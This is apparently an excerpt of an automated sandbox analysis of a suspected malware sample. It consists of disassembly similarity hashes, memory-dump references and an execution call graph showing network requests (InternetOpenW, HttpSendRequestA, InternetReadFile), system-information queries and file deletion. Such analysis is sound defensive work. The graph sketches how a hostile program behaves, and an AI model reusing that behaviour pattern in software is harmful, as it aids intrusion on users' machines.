                                                                                                                                                                                                                                          • Opcode ID: 898cd7bc68ec175da4ed4f8571e991c3f958a94f589f71851c2c2c29179b93b7
                                                                                                                                                                                                                                          • Instruction ID: cf1a1b5f03025ab4c81fc1870520303f068f595d39660f525dfc7e4b9b9f7ffb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 898cd7bc68ec175da4ed4f8571e991c3f958a94f589f71851c2c2c29179b93b7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 70F090AF10D811BEF381C5497A2AAFE53EEE2D1730334C417F843C5901D6659A5A6271
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2045877967.0000000005030000.00000040.00001000.00020000.00000000.sdmp, Offset: 05030000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_5030000_mlk3kK6uLZ.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 08844efaef5015b035bf0c9e1efc98e00ee2d8ebec54aeacebde5a8fdbdfd3c6
                                                                                                                                                                                                                                          • Instruction ID: c6078a23aee261b15cc7ab5d1833f1e801f502b2736c862c1e6a5ef5b33d4089
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 08844efaef5015b035bf0c9e1efc98e00ee2d8ebec54aeacebde5a8fdbdfd3c6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 89F027AF24E910ADE342D0493B3AAFF6BEEE6C1730330841BF843C8D01C2945A5E5272
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2045877967.0000000005030000.00000040.00001000.00020000.00000000.sdmp, Offset: 05030000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_5030000_mlk3kK6uLZ.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 3e6d8de9d19181a0e9c951cdd33ec2718a5b15c993faddad449c4df5b38aa69c
                                                                                                                                                                                                                                          • Instruction ID: b239ecb3f65ba70c7bc1df8a347fe8dcff45f65d88b691ecf82ec94d32949db5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e6d8de9d19181a0e9c951cdd33ec2718a5b15c993faddad449c4df5b38aa69c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1AF0E2BF20DA107EF341D0897A7A6FE979ED6D5330730C46BFC43DA806D29509595172
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2045877967.0000000005030000.00000040.00001000.00020000.00000000.sdmp, Offset: 05030000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_5030000_mlk3kK6uLZ.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 7d570524a371d2e98a59fcc10e8fcad982a1bed70298aa78788f3014c900ab52
                                                                                                                                                                                                                                          • Instruction ID: 944a2942fa98b80de80f2e20efab49e977380e59af4c67c628281e7b1c2afd8a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7d570524a371d2e98a59fcc10e8fcad982a1bed70298aa78788f3014c900ab52
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D3E06DAF24E921AEF341C1457E7AAFF63EED2C0730330845BF883C4905C6A55A9E6132
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2045877967.0000000005030000.00000040.00001000.00020000.00000000.sdmp, Offset: 05030000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_5030000_mlk3kK6uLZ.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: fee8cd4087893b50fc6d414f29525c7b6aa2c6f6b0414c13875bdb2014a5b2d7
                                                                                                                                                                                                                                          • Instruction ID: c4e1daa19178e4a71ccc2817cd9dd411f96a73aeb66f2773075f6fbdf3098583
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fee8cd4087893b50fc6d414f29525c7b6aa2c6f6b0414c13875bdb2014a5b2d7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 87F0E9BB54E550AEE38281457D6A5FE77EEDAC5230330849AF882C5805C25516595132
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2045877967.0000000005030000.00000040.00001000.00020000.00000000.sdmp, Offset: 05030000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_5030000_mlk3kK6uLZ.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 7cb71ed0c4ae96cfcfab97240243be0816a952a1728b0f45d5d98d6212724bcf
                                                                                                                                                                                                                                          • Instruction ID: 34775feaeadee877a9ccaa41cfffdb5251b754c199cd8f0515b7dc0533011799
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7cb71ed0c4ae96cfcfab97240243be0816a952a1728b0f45d5d98d6212724bcf
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D9E0DFEB54C9117CF242C0493E6AAFF43EEE1C17303348667F863C9A82C3894A5E1132

                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                          Execution Coverage:9.6%
                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                          Signature Coverage:2.5%
                                                                                                                                                                                                                                          Total number of Nodes:1835
                                                                                                                                                                                                                                          Total number of Limit Nodes:104
                                                                                                                                                                                                                                          execution_graph 14859 9db7b9 14860 9db6b5 11 API calls 14859->14860 14862 9db7e1 Concurrency::details::_Reschedule_chore 14860->14862 14861 9db806 14864 9db618 11 API calls 14861->14864 14862->14861 14866 9dcab1 14862->14866 14865 9db81e 14864->14865 14867 9dcacf 14866->14867 14868 9dcabf TpCallbackUnloadDllOnCompletion 14866->14868 14867->14861 14868->14867 15056 9f6539 15057 9f63d7 __fassign 2 API calls 15056->15057 15058 9f654a 15057->15058 13286 9f6954 13287 9f696c 13286->13287 13288 9f6962 13286->13288 13290 9f689d 3 API calls 13287->13290 13289 9fb4f5 DeleteFileW 13288->13289 13291 9f6969 13289->13291 13292 9f6986 13290->13292 13293 9f67fd RtlAllocateHeap 13292->13293 13294 9f6993 13293->13294 13296 9f699a ___free_lconv_mon 13294->13296 13297 9fb4f5 DeleteFileW 13294->13297 13298 9fb507 __dosmaperr 13297->13298 13298->13296 13339 9c9490 13340 9c94e4 13339->13340 13354 9d7f00 13340->13354 13342 9c952c 13343 9d7840 RtlAllocateHeap 13342->13343 13353 9c9545 shared_ptr 13343->13353 13344 9c96af 13346 9c970e 13344->13346 13347 9c97f0 13344->13347 13345 9d7840 RtlAllocateHeap 13345->13353 13348 9d7f00 RtlAllocateHeap 13346->13348 13374 9d8040 13347->13374 13351 9c9744 __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z shared_ptr 13348->13351 13352 9d7f00 RtlAllocateHeap 13352->13353 13353->13344 13353->13345 13353->13347 13353->13351 13353->13352 13367 9c5b00 13353->13367 13356 9d7f44 13354->13356 13358 9d7f1e 13354->13358 13359 9d7fbd 13356->13359 13360 9d7f98 13356->13360 13365 9d7fa9 13356->13365 13357 9d8033 13361 9c2380 RtlAllocateHeap 13357->13361 13358->13342 13364 9dd2e8 RtlAllocateHeap 13359->13364 13359->13365 13360->13357 13363 9dd2e8 RtlAllocateHeap 13360->13363 13362 9d8038 13361->13362 13363->13365 13364->13365 13366 9d8010 shared_ptr 13365->13366 13377 9d9170 13365->13377 13366->13342 13389 9c5830 13367->13389 13371 9c5b5a 13408 9c4ad0 13371->13408 13373 9c5b6b __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z shared_ptr 13373->13353 13434 9dc0dc 13374->13434 13376 9d804a 13376->13351 13380 9dc0bc 13377->13380 13383 9dc026 13380->13383 13382 9dc0cd std::_Throw_future_error 13386 9c21e0 13383->13386 13385 9dc038 13385->13382 13387 9f37bc ___std_exception_copy RtlAllocateHeap 13386->13387 13388 9c2217 __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z 13387->13388 13388->13385 13415 9d7dc0 13389->13415 13391 9c585b 13392 9c58d0 13391->13392 13393 9d7dc0 RtlAllocateHeap 13392->13393 13407 9c5935 13393->13407 13394 9d7840 RtlAllocateHeap 13394->13407 13395 9c5af9 13397 9d8040 RtlAllocateHeap 13395->13397 13396 9c5acd __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z 13396->13371 13399 9c5afe 13397->13399 13398 9d7f00 RtlAllocateHeap 13398->13407 13401 9c5830 RtlAllocateHeap 13399->13401 13402 9c5b44 13401->13402 13403 9c58d0 RtlAllocateHeap 13402->13403 13404 9c5b5a 13403->13404 13405 9c4ad0 RtlAllocateHeap 13404->13405 13406 9c5b6b __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z shared_ptr 13405->13406 13406->13371 13407->13394 13407->13395 13407->13396 13407->13398 13428 9c5620 13407->13428 13409 9c4b2e 13408->13409 13410 9c4b04 13408->13410 13413 9d7dc0 RtlAllocateHeap 13409->13413 13411 9d7f00 RtlAllocateHeap 13410->13411 13412 9c4b1b __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z 13411->13412 13412->13373 13414 9c4b8b __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z 13413->13414 13414->13373 13414->13414 13417 9d7dde __cftof 13415->13417 13419 9d7e07 13415->13419 13416 9d9170 RtlAllocateHeap 13418 9d7ef8 13416->13418 13417->13391 13420 9c2380 RtlAllocateHeap 13418->13420 13421 9d7e7e 13419->13421 13422 9d7e5b 13419->13422 13426 9d7e6c __cftof 13419->13426 13423 9d7efd 13420->13423 13425 9dd2e8 RtlAllocateHeap 13421->13425 13421->13426 13422->13418 13424 9dd2e8 RtlAllocateHeap 13422->13424 13424->13426 13425->13426 13426->13416 13427 9d7ed5 shared_ptr 13426->13427 13427->13391 13432 9c5750 __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z shared_ptr 13428->13432 13433 9c5689 shared_ptr 13428->13433 13429 9c581a 13431 9d8040 RtlAllocateHeap 13429->13431 13430 9d7f00 RtlAllocateHeap 13430->13433 13431->13432 13432->13407 13433->13429 13433->13430 13433->13432 13437 9dc060 13434->13437 13436 9dc0ed std::_Throw_future_error 13436->13376 13438 9c21e0 std::invalid_argument::invalid_argument RtlAllocateHeap 13437->13438 13439 9dc072 13438->13439 13439->13436 13440 9c8690 13441 9c8696 13440->13441 13442 9c86b6 13441->13442 13445 9f66c7 13441->13445 13444 9c86b0 13446 9f66d3 __fassign 13445->13446 13448 9f66dd __dosmaperr ___std_exception_copy 13446->13448 13449 9f6650 13446->13449 13448->13444 13450 9f6672 13449->13450 13452 9f665d __dosmaperr ___std_exception_copy ___free_lconv_mon 13449->13452 13450->13452 13453 9f9ed9 13450->13453 13452->13448 13454 9f9f16 13453->13454 13455 9f9ef1 13453->13455 13454->13452 13455->13454 13457 a002d8 13455->13457 13458 a002e4 __fassign 13457->13458 13460 a002ec __dosmaperr ___std_exception_copy 13458->13460 13461 a003ca 13458->13461 13460->13454 13462 a003ec 13461->13462 13463 a003f0 __dosmaperr ___std_exception_copy 13461->13463 13462->13463 13465 9ffb5f 13462->13465 13463->13460 13466 9ffbac 13465->13466 13467 9f681a __fassign 3 API calls 13466->13467 13471 9ffbbb __cftof 13467->13471 13469 9fc4ca GetPEB GetPEB RtlAllocateHeap __fassign 13469->13471 13470 9ffe5b __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z 13470->13463 13471->13469 13471->13470 13472 9fd2c9 13471->13472 13473 9fd2d4 13472->13473 13474 9fb49b __fassign 2 API calls 13473->13474 13475 9fd2e4 13474->13475 13475->13471 14879 9cc7d0 14880 9cc827 14879->14880 14885 9d8ce0 14880->14885 14882 9cc83c 14883 9d8ce0 RtlAllocateHeap 14882->14883 14884 9cc878 __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z shared_ptr 14883->14884 14886 9d8e2f 14885->14886 14887 9d8d05 14885->14887 14888 9d9170 RtlAllocateHeap 14886->14888 14891 9d8d4c 14887->14891 14892 9d8d76 14887->14892 14889 9d8e34 14888->14889 14890 9c2380 RtlAllocateHeap 14889->14890 14896 9d8d5d shared_ptr __cftof 14890->14896 14891->14889 14893 9d8d57 14891->14893 14895 9dd2e8 RtlAllocateHeap 14892->14895 14892->14896 14894 9dd2e8 RtlAllocateHeap 14893->14894 14894->14896 14895->14896 14896->14882 13476 9d6ab0 13479 9d6ae0 13476->13479 13477 9d7840 RtlAllocateHeap 13477->13479 13478 9c5b00 RtlAllocateHeap 13478->13479 13479->13477 13479->13478 13481 9d4690 13479->13481 13482 9d46cb 13481->13482 13561 9d4d50 shared_ptr 13481->13561 13484 9d7840 RtlAllocateHeap 13482->13484 13482->13561 13483 9d4e39 __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z shared_ptr 13483->13479 13485 9d46ec 13484->13485 13486 9c5b00 RtlAllocateHeap 13485->13486 13487 9d46f3 13486->13487 13488 9d7840 RtlAllocateHeap 13487->13488 13490 9d4705 13488->13490 13492 9d7840 RtlAllocateHeap 13490->13492 13491 9d4ef5 13813 9c6900 13491->13813 13494 9d4717 13492->13494 13739 9cbd30 13494->13739 13496 9d4723 13499 9d7840 RtlAllocateHeap 13496->13499 13497 9d4fbe shared_ptr 13823 9c7ce0 13497->13823 13502 9d4738 13499->13502 13500 9d4fcd 13888 9c44b0 13500->13888 13501 9d4f05 shared_ptr 13501->13497 13535 9d6a86 13501->13535 13504 9d7840 RtlAllocateHeap 13502->13504 13506 9d4750 13504->13506 13505 9d4fda 13892 9c8290 13505->13892 13508 9c5b00 RtlAllocateHeap 13506->13508 13510 9d4757 13508->13510 13509 9d4fe6 13511 9c44b0 RtlAllocateHeap 13509->13511 13764 9c8490 13510->13764 13513 9d4ff3 13511->13513 13520 9c44b0 RtlAllocateHeap 13513->13520 13514 9d4763 13517 9d7840 RtlAllocateHeap 13514->13517 13597 9d49dd 13514->13597 13515 9c5b00 RtlAllocateHeap 13515->13535 13516 9d7840 RtlAllocateHeap 13519 9d4a0f 13516->13519 13518 9d477f 13517->13518 13522 9d7840 RtlAllocateHeap 13518->13522 13523 9d7840 RtlAllocateHeap 13519->13523 13524 9d5010 13520->13524 13521 9d7840 RtlAllocateHeap 13521->13535 13525 9d4797 13522->13525 13526 9d4a24 13523->13526 13527 9d7840 RtlAllocateHeap 13524->13527 13528 9c5b00 RtlAllocateHeap 13525->13528 13529 9d7840 RtlAllocateHeap 13526->13529 13530 9d502e 13527->13530 13532 9d479e 13528->13532 13533 9d4a36 13529->13533 13534 9c5b00 RtlAllocateHeap 13530->13534 13531 9d4690 16 API calls 13531->13535 13536 9c8490 RtlAllocateHeap 13532->13536 13537 9cbd30 7 API calls 13533->13537 13538 9d5035 13534->13538 13535->13515 13535->13521 13535->13531 13540 9d47aa 13536->13540 13541 9d4a42 13537->13541 13539 9d7840 RtlAllocateHeap 13538->13539 13542 9d504a 13539->13542 13545 9d7840 RtlAllocateHeap 13540->13545 13540->13597 13543 9d7840 RtlAllocateHeap 13541->13543 13544 9c5b00 RtlAllocateHeap 13542->13544 13546 9d4a57 13543->13546 13553 9d5051 13544->13553 13547 9d47c7 13545->13547 13548 9d7840 RtlAllocateHeap 13546->13548 13549 9c5b00 RtlAllocateHeap 13547->13549 13550 9d4a6f 13548->13550 13555 9d47cf 13549->13555 13551 9c5b00 RtlAllocateHeap 13550->13551 13552 9d4a76 13551->13552 13554 9c8490 RtlAllocateHeap 13552->13554 13559 9d7f00 RtlAllocateHeap 13553->13559 13556 9d4a82 13554->13556 13557 9d7f00 RtlAllocateHeap 13555->13557 13558 9d7840 RtlAllocateHeap 13556->13558 13556->13561 13568 9d4839 shared_ptr 13557->13568 13560 9d4a9e 13558->13560 13569 9d50cd 13559->13569 13562 9d7840 RtlAllocateHeap 13560->13562 13561->13483 13791 9c6590 13561->13791 13563 9d4ab6 13562->13563 13564 9c5b00 RtlAllocateHeap 13563->13564 13567 9d4abd 13564->13567 13565 9d7840 RtlAllocateHeap 13566 9d48c6 13565->13566 13571 9c5b00 RtlAllocateHeap 13566->13571 13572 9c8490 RtlAllocateHeap 13567->13572 13568->13565 13904 9d7c20 13569->13904 13577 9d48ce 13571->13577 13574 9d4ac9 13572->13574 13573 9d5139 13917 9d8350 13573->13917 13574->13561 13576 9d7840 RtlAllocateHeap 13574->13576 13578 9d4ae6 13576->13578 13579 9d7f00 RtlAllocateHeap 13577->13579 13580 9c5b00 RtlAllocateHeap 13578->13580 13582 9d4929 shared_ptr 13579->13582 13583 9d4aee 13580->13583 13581 9d5175 shared_ptr 13587 9d7f00 RtlAllocateHeap 13581->13587 13582->13597 13922 9c9800 13582->13922 13584 9d4b3a 13583->13584 13585 9d4e77 13583->13585 13589 9d7f00 RtlAllocateHeap 13584->13589 13588 9d8040 RtlAllocateHeap 13585->13588 13601 9d523d shared_ptr 13587->13601 13590 9d4e7c 13588->13590 13598 9d4b58 shared_ptr 13589->13598 13591 9dc0dc RtlAllocateHeap 13590->13591 13591->13561 13592 9d49b5 __dosmaperr 13592->13597 13927 9f8959 13592->13927 13593 9d7840 RtlAllocateHeap 13595 9d4be5 13593->13595 13599 9c5b00 RtlAllocateHeap 13595->13599 13596 9c44b0 RtlAllocateHeap 13600 9d52dd 13596->13600 13597->13516 13597->13590 13598->13561 13598->13593 13605 9d4bed 13599->13605 13602 9d7840 RtlAllocateHeap 13600->13602 13601->13596 13603 9d52f7 13602->13603 13604 9c5b00 RtlAllocateHeap 13603->13604 13606 9d5302 13604->13606 13608 9d7f00 RtlAllocateHeap 13605->13608 13607 9c44b0 RtlAllocateHeap 13606->13607 13609 9d5317 13607->13609 13612 9d4c48 shared_ptr 13608->13612 13610 9d7840 RtlAllocateHeap 13609->13610 13611 9d532b 13610->13611 13613 9c5b00 RtlAllocateHeap 13611->13613 13612->13561 13614 9d7840 RtlAllocateHeap 13612->13614 13615 9d5336 13613->13615 13616 9d4cd7 13614->13616 13617 9d7840 RtlAllocateHeap 13615->13617 13618 9d7840 RtlAllocateHeap 13616->13618 13619 9d5354 13617->13619 13620 9d4cec 13618->13620 13621 9c5b00 RtlAllocateHeap 13619->13621 13622 9d7840 RtlAllocateHeap 13620->13622 13623 9d535f 13621->13623 13624 9d4d07 13622->13624 13625 9d7840 RtlAllocateHeap 13623->13625 13626 9c5b00 RtlAllocateHeap 13624->13626 13627 9d537d 13625->13627 13628 9d4d0e 13626->13628 13629 9c5b00 RtlAllocateHeap 13627->13629 13631 9d7f00 RtlAllocateHeap 13628->13631 13630 9d5388 13629->13630 13632 9d7840 RtlAllocateHeap 13630->13632 13633 9d4d47 13631->13633 13634 9d53a6 13632->13634 13770 9d4270 13633->13770 13635 9c5b00 RtlAllocateHeap 13634->13635 13637 9d53b1 13635->13637 13638 9d7840 RtlAllocateHeap 13637->13638 13639 9d53cf 13638->13639 13640 9c5b00 RtlAllocateHeap 13639->13640 13641 9d53da 13640->13641 13642 9d7840 RtlAllocateHeap 13641->13642 13643 9d53f8 13642->13643 13644 9c5b00 RtlAllocateHeap 13643->13644 13645 9d5403 13644->13645 13646 9d7840 RtlAllocateHeap 13645->13646 13647 9d5421 13646->13647 13648 9c5b00 RtlAllocateHeap 13647->13648 13649 9d542c 13648->13649 13650 9d7840 RtlAllocateHeap 13649->13650 13651 9d544a 13650->13651 13652 9c5b00 RtlAllocateHeap 13651->13652 13653 9d5455 13652->13653 13654 9d7840 RtlAllocateHeap 13653->13654 13655 9d5471 13654->13655 13656 9c5b00 RtlAllocateHeap 13655->13656 13657 9d547c 13656->13657 13658 9d7840 RtlAllocateHeap 13657->13658 13659 9d5493 13658->13659 13660 9c5b00 RtlAllocateHeap 13659->13660 13661 9d549e 13660->13661 13662 9d7840 RtlAllocateHeap 13661->13662 13663 9d54b5 13662->13663 13664 9c5b00 RtlAllocateHeap 13663->13664 13665 9d54c0 13664->13665 13666 9d7840 RtlAllocateHeap 13665->13666 13667 9d54dc 13666->13667 13668 9c5b00 RtlAllocateHeap 13667->13668 13669 9d54e7 13668->13669 13931 9d8160 13669->13931 13671 9d54fb 13935 9d8060 13671->13935 13673 9d550f 13674 9d8060 RtlAllocateHeap 13673->13674 13675 9d5523 13674->13675 13676 9d8060 RtlAllocateHeap 13675->13676 13677 9d5537 13676->13677 13678 9d8160 RtlAllocateHeap 13677->13678 13679 9d554b 13678->13679 13680 9d8060 RtlAllocateHeap 13679->13680 13681 9d555f 13680->13681 13682 9d8160 RtlAllocateHeap 13681->13682 13683 9d5573 13682->13683 13684 9d8060 RtlAllocateHeap 13683->13684 13685 9d5587 13684->13685 13686 9d8160 RtlAllocateHeap 13685->13686 13687 9d559b 13686->13687 13688 9d8060 RtlAllocateHeap 13687->13688 13689 9d55af 13688->13689 13690 9d8160 RtlAllocateHeap 13689->13690 13691 9d55c3 13690->13691 13692 9d8060 RtlAllocateHeap 13691->13692 13693 9d55d7 13692->13693 13694 9d8160 RtlAllocateHeap 13693->13694 13695 9d55eb 13694->13695 13696 9d8060 RtlAllocateHeap 13695->13696 13697 9d55ff 13696->13697 13698 9d8160 RtlAllocateHeap 13697->13698 13699 9d5613 13698->13699 13700 9d8060 RtlAllocateHeap 13699->13700 13701 9d5627 13700->13701 13702 9d8160 RtlAllocateHeap 13701->13702 13703 9d563b 13702->13703 13704 9d8060 RtlAllocateHeap 13703->13704 13705 9d564f 13704->13705 13706 9d8160 RtlAllocateHeap 13705->13706 13707 9d5663 13706->13707 13708 9d8060 RtlAllocateHeap 13707->13708 13709 9d5677 13708->13709 13710 9d8060 RtlAllocateHeap 13709->13710 13711 9d568b 13710->13711 13712 9d8060 RtlAllocateHeap 13711->13712 13713 9d569f 13712->13713 13714 9d8160 RtlAllocateHeap 13713->13714 13715 9d56b3 shared_ptr 13714->13715 13716 9d649b 13715->13716 13717 9d6347 13715->13717 13718 9d7840 RtlAllocateHeap 13716->13718 13719 9d7840 RtlAllocateHeap 13717->13719 13720 9d64b0 13718->13720 13721 9d635d 13719->13721 13722 9d7840 RtlAllocateHeap 13720->13722 13723 9c5b00 RtlAllocateHeap 13721->13723 13724 9d64c5 13722->13724 13725 9d6368 13723->13725 13943 9c4940 13724->13943 13727 9d8160 RtlAllocateHeap 13725->13727 13738 9d637c __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z shared_ptr 13727->13738 13728 9d64d4 13950 9d75a0 13728->13950 13730 9d6616 13731 9d7840 RtlAllocateHeap 13730->13731 13732 9d662c 13731->13732 13733 9c5b00 RtlAllocateHeap 13732->13733 13735 9d6637 13733->13735 13734 9d651b 13734->13730 13736 9d8ba0 RtlAllocateHeap 13734->13736 13737 9d8060 RtlAllocateHeap 13735->13737 13736->13734 13737->13738 13738->13479 13740 9cc171 13739->13740 13741 9cbd82 13739->13741 13742 9d7f00 RtlAllocateHeap 13740->13742 13741->13740 13743 9cbd96 InternetOpenW InternetConnectA 13741->13743 13749 9cc11e __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z shared_ptr 13742->13749 13744 9d7840 RtlAllocateHeap 13743->13744 13745 9cbe0d 13744->13745 13746 9c5b00 RtlAllocateHeap 13745->13746 13747 9cbe18 HttpOpenRequestA 13746->13747 13750 9cbe41 shared_ptr 13747->13750 13749->13496 13751 9d7840 RtlAllocateHeap 13750->13751 13752 9cbea9 13751->13752 13753 9c5b00 RtlAllocateHeap 13752->13753 13754 9cbeb4 13753->13754 13755 9d7840 RtlAllocateHeap 13754->13755 13756 9cbecd 13755->13756 13757 9c5b00 RtlAllocateHeap 13756->13757 13758 9cbed8 HttpSendRequestA 13757->13758 13760 9cbefb shared_ptr 13758->13760 13761 9cbf83 InternetReadFile 13760->13761 13762 9cbfaa 13761->13762 13763 9cc02f InternetReadFile 13762->13763 13763->13762 13768 9c85b0 __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z shared_ptr 13764->13768 13769 9c84e5 shared_ptr 13764->13769 13765 9c8677 13767 9d8040 RtlAllocateHeap 13765->13767 13766 9d7f00 RtlAllocateHeap 13766->13769 13767->13768 13768->13514 13769->13765 13769->13766 13769->13768 13771 9d7840 RtlAllocateHeap 13770->13771 13772 9d42b2 13771->13772 13773 9d7840 RtlAllocateHeap 13772->13773 13774 9d42c4 13773->13774 13775 9c8490 RtlAllocateHeap 13774->13775 13776 9d42cd 13775->13776 13777 9d4526 13776->13777 13789 9d42d8 shared_ptr 13776->13789 13778 9d7840 RtlAllocateHeap 13777->13778 13779 9d4537 13778->13779 13780 9d7840 RtlAllocateHeap 13779->13780 13782 9d454c 13780->13782 13781 9d7f00 RtlAllocateHeap 13781->13789 13783 9d7840 RtlAllocateHeap 13782->13783 13786 9d455e 13783->13786 13784 9d44f0 __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z shared_ptr 13784->13561 13787 9d3520 8 API calls 13786->13787 13787->13784 13788 9d7840 RtlAllocateHeap 13788->13789 13789->13781 13789->13784 13789->13788 13962 9d9180 13789->13962 13967 9d3520 13789->13967 13792 9c65ef 13791->13792 13793 9d7840 RtlAllocateHeap 13792->13793 13794 9c6656 13793->13794 13795 9c5b00 RtlAllocateHeap 13794->13795 13796 9c6661 13795->13796 13797 9c21c0 3 API calls 13796->13797 13798 9c6679 shared_ptr 13797->13798 13799 9d7840 RtlAllocateHeap 13798->13799 13811 9c6893 __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z shared_ptr 13798->13811 13800 9c66e2 13799->13800 13801 9c5b00 RtlAllocateHeap 13800->13801 13802 9c66ed 13801->13802 13803 9c21c0 3 API calls 13802->13803 13812 9c6707 shared_ptr 13803->13812 13804 9c6802 13805 9d7f00 RtlAllocateHeap 13804->13805 13807 9c684c 13805->13807 13806 9d7840 RtlAllocateHeap 13806->13812 13808 9d7f00 RtlAllocateHeap 13807->13808 13808->13811 13809 9c5b00 RtlAllocateHeap 13809->13812 13810 9c21c0 3 API calls 13810->13812 13811->13491 13812->13804 13812->13806 13812->13809 13812->13810 13812->13811 13821 9c6c51 13813->13821 13822 9c6978 shared_ptr 13813->13822 13814 9c6c74 13816 9d7f00 RtlAllocateHeap 13814->13816 13815 9c6d13 13817 9d8040 RtlAllocateHeap 13815->13817 13818 9c6c93 __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z shared_ptr 13816->13818 13817->13818 13818->13501 13819 9d7f00 RtlAllocateHeap 13819->13822 13820 9d9180 RtlAllocateHeap 13820->13822 13821->13814 13821->13815 13822->13815 13822->13818 13822->13819 13822->13820 13822->13821 13824 9c7d46 __cftof 13823->13824 13825 9d7840 RtlAllocateHeap 13824->13825 13859 9c7e98 __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z shared_ptr 13824->13859 13826 9c7d77 13825->13826 13827 9c5b00 RtlAllocateHeap 13826->13827 13828 9c7d82 13827->13828 13829 9d7840 RtlAllocateHeap 13828->13829 13830 9c7da4 13829->13830 13831 9c5b00 RtlAllocateHeap 13830->13831 13832 9c7daf shared_ptr 13831->13832 13833 9c7e87 13832->13833 13834 9c7e83 GetNativeSystemInfo 13832->13834 13832->13859 13835 9c7eef 13833->13835 13836 9c7fc9 13833->13836 13833->13859 13834->13833 13838 9d7840 RtlAllocateHeap 13835->13838 13837 9d7840 RtlAllocateHeap 13836->13837 13839 9c7ff5 13837->13839 13840 9c7f10 13838->13840 13841 9c5b00 RtlAllocateHeap 13839->13841 13842 9c5b00 RtlAllocateHeap 13840->13842 13843 9c7ffc 13841->13843 13844 9c7f17 13842->13844 13845 9d7840 RtlAllocateHeap 13843->13845 13846 9d7840 RtlAllocateHeap 13844->13846 13847 9c8014 13845->13847 13848 9c7f2f 13846->13848 13850 9c5b00 RtlAllocateHeap 13847->13850 13849 9c5b00 RtlAllocateHeap 13848->13849 13852 9c7f36 13849->13852 13851 9c801b 13850->13851 13853 9d7840 RtlAllocateHeap 13851->13853 14542 9f8a61 13852->14542 13855 9c804c 13853->13855 13856 9c5b00 RtlAllocateHeap 13855->13856 13857 9c8053 13856->13857 13858 9c5620 RtlAllocateHeap 13857->13858 13860 9c8062 13858->13860 13859->13500 13861 9d7840 RtlAllocateHeap 13860->13861 13862 9c809d 13861->13862 13863 9c5b00 RtlAllocateHeap 13862->13863 13864 9c80a4 13863->13864 13865 9d7840 RtlAllocateHeap 13864->13865 13866 9c80bc 13865->13866 